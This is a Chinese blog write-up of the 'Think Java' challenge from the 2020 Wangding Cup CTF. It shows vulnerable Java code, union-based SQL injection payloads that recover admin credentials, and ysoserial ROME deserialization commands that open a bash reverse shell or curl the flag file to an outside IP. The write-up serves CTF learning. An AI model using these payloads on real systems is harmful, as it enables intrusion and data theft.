[网鼎杯 2020 朱雀组]Think Java

最新推荐文章于 2024-05-23 09:45:45 发布
最新推荐文章于 2024-05-23 09:45:45 发布
阅读量701 收藏 1
点赞数 1
分类专栏: 优秀文章 秀秀 文章标签: java mysql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52549196/article/details/129455368
版权
优秀文章 同时被 2 个专栏收录
166 篇文章 58 订阅 ¥9.90 ¥99.00
订阅专栏
秀秀
178 篇文章 2 订阅
订阅专栏
本文探讨了SqlDict.java中由于未过滤dbName导致的SQL注入问题,以及Swagger UI在接口测试中的应用。同时,文章提到了Java反序列化漏洞,利用java Deserialization Scanner扫描base64数据,并通过ysoserial工具进行分析。最终,通过curl命令演示了如何利用这些漏洞获取flag。
摘要由CSDN通过智能技术生成

SqlDict.java ,其中sql语句处存在sql注入漏洞

package .sqldict;

import cn.abc.core.sqldict.Row;
import cn.abc.core.sqldict.Table;
import java.sql.Connection;
import java.sql.DatabaseMetaData;
import java.sql.DriverManager;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
import java.util.ArrayList;
import java.util.List;

public class SqlDict {
  public static Connection getConnection(String dbName, String user, String pass) {
    Connection conn = null;
    try {
      Class.forName("com.mysql.jdbc.Driver");
      if (dbName != null && !dbName.equals("")) {
        dbName = "jdbc:mysql://mysqldbserver:3306/" + dbName;
      } else {
        dbName = "jdbc:mysql://mysqldbserver:3306/myapp";
      } 
      if (user == null || dbName.equals(""))
        user = "root"; 
      if (pass == null || dbName.equals(""))
        pass = "abc@12345"; 
      conn = DriverManager.getConnection(dbName, user, pass);
    } catch (ClassNotFoundException var5) {
      var5.printStackTrace();
    } catch (SQLException var6) {
      var6.printStackTrace();
    } 
    return conn;
  }
  
  public static List<Table> getTableData(String dbName, String user, String pass) {
    List<Table> Tables = new ArrayList<>();
    Connection conn = getConnection(dbName, user, pass);
    String TableName = "";
    try {
      Statement stmt = conn.createStatement();
      DatabaseMetaData metaData = conn.getMetaData();
      ResultSet tableNames = metaData.getTables((String)null, (String)null, (String)null, new String[] { "TABLE" });
      while (tableNames.next()) {
        TableName = tableNames.getString(3);
        Table table = new Table();
        String sql = "Select TABLE_COMMENT from INFORMATION_SCHEMA.TABLES Where table_schema = '" + dbName + "' and table_name='" + TableName + "';";
        ResultSet rs = stmt.executeQuery(sql);
        while (rs.next())
          table.setTableDescribe(rs.getString("TABLE_COMMENT")); 
        table.setTableName(TableName);
        ResultSet data = metaData.getColumns(conn.getCatalog(), (String)null, TableName, "");
        ResultSet rs2 = metaData.getPrimaryKeys(conn.getCatalog(), (String)null, TableName);
        String PK;
        for (PK = ""; rs2.next(); PK = rs2.getString(4));
        while (data.next()) {
          Row row = new Row(data.getString("COLUMN_NAME"), data.getString("TYPE_NAME"), data.getString("COLUMN_DEF"), data.getString("NULLABLE").equals("1") ? "YES" : "NO", data.getString("IS_AUTOINCREMENT"), data.getString("REMARKS"), data.getString("COLUMN_NAME").equals(PK) ? "true" : null, data.getString("COLUMN_SIZE"));
          table.list.add(row);
        } 
        Tables.add(table);
      } 
    } catch (SQLException var16) {
      var16.printStackTrace();
    } 
    return Tables;
  }
}

Swagger

swagger-ui 提供了一个可视化的UI页面展示描述文件。接口的调用方、测试、项目经理等都可以在该页面中对相关接口进行查阅和做一些简单的接口请求。该项目支持在线导入描述文件和本地部署UI项目。

/swagger-ui.html

在这里插入图片描述

可以发现 dbName 没有过滤直接参与了 SQL 语句进行数据查询,所以这里存在 SQL 注入

同时需要满足 jdbc 协议的连接不能出错

JDBC 的 URL 也类似 http 请求中的 URL,也可以使用锚点 # 或者 ?
如:jdbc:mysql://mysqldbserver:3306/myapp#’ union select 2#

在这里插入图片描述

myapp#' union select group_concat(SCHEMA_NAME)from(information_schema.schemata)#
//      "tableDescribe": "information_schema,myapp,mysql,performance_schema,sys",
myapp#' union select group_concat(table_name)from(information_schema.tables)where(table_schema='myapp')#
//      "tableDescribe": "user",
myapp#' union select group_concat(column_name)from(information_schema.columns)where((table_schema='myapp')and(table_name='user'))#
//      "tableDescribe": "id,name,pwd"
myapp#' union select group_concat(name,0x7e,pwd)from(user)#
//      "tableDescribe": "admin~admin@Rrrr_ctf_asde"

然后将用户名和密码在/common/user/login处提交,获取一串字符

{
  "password": "admin@Rrrr_ctf_asde",
  "username": "admin"
}

{
  "data": "Bearer rO0ABXNyABhjbi5hYmMuY29yZS5tb2RlbC5Vc2VyVm92RkMxewT0OgIAAkwAAmlkdAAQTGphdmEvbGFuZy9Mb25nO0wABG5hbWV0ABJMamF2YS9sYW5nL1N0cmluZzt4cHNyAA5qYXZhLmxhbmcuTG9uZzuL5JDMjyPfAgABSgAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAAAAAAAAXQABWFkbWlu",
  "msg": "登录成功",
  "status": 2,
  "timestamps": 1678501421371
}

下方的特征可以作为序列化的标志参考:
一段数据以rO0AB开头,你基本可以确定这串就是Java序列化base64加密的数据。
或者如果以aced开头,那么他就是这一段Java序列化的16进制。

java Deserialization Scanner插件使用然后选择base64开始扫描,结果回显ROME有可能

在这里插入图片描述

ysoserial

curl将flag带出来

bash -i >& /dev/tcp/44.44.44.44/4455 0>&1

YmFzaCAtaSAgPiYgL2Rldi90Y3AvNDQuNDQuNDQuNDQvNDQ1NSAwPiYxCg==

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar ROME "bash -c {echo,YmFzaCAtaSAgPiYgL2Rldi90Y3AvNDQuNDQuNDQuNDQvNDQ1NSAwPiYxCg==}|{base64,-d}|{bash,-i}" | base64

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar ROME "curl http://44.44.44.44:4455 -d @/flag" | base64

注意最后提交的时候,要在前面加上Bearer

参考文章:https://blog.csdn.net/RABCDXB/article/details/124003575

????27282
关注
专栏目录
订阅专栏
phpweb-[网鼎杯 2020 朱雀]-[BUUCTF]
qwsn
11-23 2044
0x01、Web 1.phpweb-[网鼎杯 2020 朱雀]-[传送门->BUUCTF] 第一步:点击传送门,打开题目环境 观察题目页面: //打开网页观察网页显示动态,发现网页每隔一段时间会刷新一下,说明可能自动间隔一段时间刷新一次,观察网页,网页上会显示一段warning信息,并提示了data()函数。 //利用BurpSuite拦截网页,看一下有什么异常。观察发现网页会传递两个参数,func和p。func对应的值为date,p对应的值为一串时间格式,说明网页可能向后端传递函数名及其对应的参数
[网鼎杯 2020 朱雀]Nmap 1
plant1234的博客
04-15 2493
[网鼎杯 2020 朱雀]Nmap 1 首先得到题目打开得到 说是输入houst和IP进行扫描 测试一波:127.0.0.1 得到: 本地测一下nmap 命令得到: 发现效果一样 这里需要知道 nmap 命令将扫描结果保存在文件里面: 例如:将nmap 127.0.0.1的结果保存在test.txt里面 nmap 127.0.0.1 -oN test.txt nmap其他写文件命令: -oN (标准输出) -oX (XML输出) -oS (ScRipT KIdd|3 oUTpuT) -oG (G
CTF网鼎杯2020朱雀 thinkjava思路记录
最新发布
c0529的博客
05-23 1334
1.代码分析 BUUCTF在线评测 (buuoj.cn)打开ctf赛题之后,下载class文件,这个部分是不完整点的源码 在sqldict中存在一个sql注入点,没有采用java的预编译,调用了这个的是在test中,同时,这个采用了swagger接口,这是一个测试页面的接口,我们直接尝试打开这个页面 打开 网址/swagger-ui.html 2.测试点1 这里可以看见有三个可以测试的位置,参考源码中的文件地址,可以发现sql注入点存在在test这个测试中,我们dbName注入sql注
网鼎2020-朱雀.rar
05-24
网鼎2020-朱雀.rar除了web题
网鼎杯 2020 朱雀】Think Java
更多知识欢迎访问我的博客园:https://www.cnblogs.com/2ha0yuk7on/
04-08 4864
网鼎杯 2020 朱雀】Think Java 首先下载题目附件,是一些.class文件,反编译查看。 注意到引入的其中一个包: import io.swagger.annotations.ApiOperation; Swagger Swagger 是一个规范和完整的框架,用于生成、描述、调用和可视化 RESTful 风格的 Web 服务。总体目标是使客户端和文件系统作为服务器以同样的速度来更新。文件的方法,参数和模型紧密集成到服务器端的代码,允许API来始终保持同步。 Swagger UI 提供了
2020网鼎杯朱雀题目.rar
05-20
含有misc,re,crypto,pwn,web。web题为thinkjava
2022网鼎杯初赛朱雀赛题
10-18
2022网鼎杯初赛朱雀赛题
朱雀JAVA游戏_[网鼎杯2020朱雀]Think JAVA
weixin_36087895的博客
02-27 285
前言现在算是取得了很大的希望。但此题必有玄机。这就是朱雀31解的题,tqllllllllllll。下面是现在的功效,然则我照样没能拿到flag……菜,枯了。进入正题下方截图算是hint , 固然对于没有用过swagger-ui的 ,照样不算hint的叭(我都是问的大佬)。他是一个测试接口,我原本分享了swagger-ui的链接来着,然则现在谁人链接好像被接见炸了。(我在文章中已经把链接删了……考...
CTFHUB-think_java(2020-网鼎杯-朱雀-Web-think_java)
qq_51953382的博客
07-20 491
将编码后的内容填充到命令上,再通过ysoserial获得bin文件,拿到文件之后,我们还需要对其进行base64加密,这里使用的一个Python脚本。但是这是网鼎杯原题的payload,那个题目中flag名称就是flag,是不变的所以可以这么用,通过-d @来提取flag文件内容然后发到自己服务器。获得payload之后,先在咱们的服务器上监听端口之后,在另一个接口处输入payload,来进行反弹shell,注意开头的Bearer保留。进入之后,将我们的得到的信息输入登录实例,来进行调用。
网鼎杯2020朱雀-web(Think Java)
weixin_43610673的博客
05-19 2589
下载class.zip解压后用jd-gui查看源码,我是用jd-gui弄出来然后sublime看的 在/common/test/sqlDict有个注入 主要是SqlDict.class 下面注入即可dbName=myapp?useUnicode=true’union/**/select/**/1 这里用post或者get提交都行 dbName=myapp?useUnicode=true'union/**/select/**/group_concat(SCHEMA_NAME)from(informati
Ctfhub-think_java-2020网鼎杯-朱雀
weixin_54227009的博客
12-27 691
唉,做ctfhub这道题的时候,发现网上几乎都是跟风用的这个命令来直接读取根目录下的flag,我看了buuctf上的这道题因为flag就在跟目录下,flag的名称并没有变化,故可以直接读到flag。但ctfhub上这道题,题目已经提示了flag在根目录下,且flag名字是随机的,故用该方法并不能直接读取到flag,所以只有反弹shell的命令来cat flag。
CTFHub靶场 --题目:think_java
weixin_52221158的博客
08-18 578
推测与sql注入有关,打开sqldict.class,发现连接数据库的代码 以及数据库查询语句。让你看的是那个返回包里面的ctfhub账户名,说明这个账户名是被反序列化过后得到值。返回data,以rO0AB开头,java序列化,在身份认证处提交。相当于把服务器的token数据先base64解密,再反序列化。生成bin文件,在进行base64加密,文件更改名字即可。此处为请求地址,加入请求,并结合代码加入注入代码。开始入手,burp抓包,发至repeater。在该接口测试登录,try it out。...
Think-java_12
yaoming168的专栏
10-29 1053
1、编写一个类,在其main ()方法中的try块里抛出一个Exception类的对象。传递一个字符串参数给Exception的构造器。在catch子句里捕获此异常对象,并且打印字串参数。添加一个finally子句,打印一条信息以证明这里确实得到了执行。 // 自定义的 Exception1 类要继承 Exception class Exception1 extends Exc...
Java think——操作符
LMF283的博客
01-01 220
Java中使用random函数。Java中调用random函数时,如果给定random函数一个种子,则生成一个固定的数,例如Random r = new Random(74),则生成的数据为24,如果不给定种子数,则函数每次取当前的时间作为种子数,则每次生成的数不相同。如果使用random函数的对象调用nextint(参数为:指定随机函数生成的范围)例如:r.nextInt(100)的意思是随机...
java think_ThinkJava-输入和输出
weixin_36201438的博客
02-20 211
//Static functions for reading and writing text files as//a single string, and treating a file as an ArrayList.packagecom.java.io;importjava.io.BufferedReader;importjava.io.File;importjava.io.FileRead...
网鼎杯2020 朱雀部分writeup
yusakul的博客
05-19 1607
Reverse –go 替换了base64字典 解题思路: 程序将我们输入的key,经过换了编码字典的base64加密后,去掉最后==,计算key加密后的长度,长度为0x16,就开始解密。那么我们只需要输入正确的key就有flag了,知道了base64加密字典XYZFGHI2+/Jhi345jklmEnopuvwqrABCDKL6789abMNWcdefgstOPQRSTUVxyz01,和密文nRKKAHzMrQzaqQzKpPHClX==,解密如下: Reverse –tree 解题思路:
[网鼎杯 2020 朱雀]nmap
03-16
nmap是一款网络扫描工具,可以用来扫描目标主机的开放端口、操作系统类型、服务版本等信息。它可以帮助安全人员评估网络安全状况,发现潜在的漏洞和攻击面。同时,nmap也可以用来管理网络,例如发现新设备、检查网络拓扑等。nmap具有强大的扫描功能和灵活的配置选项,是网络安全工作者必备的工具之一。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

????27282

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值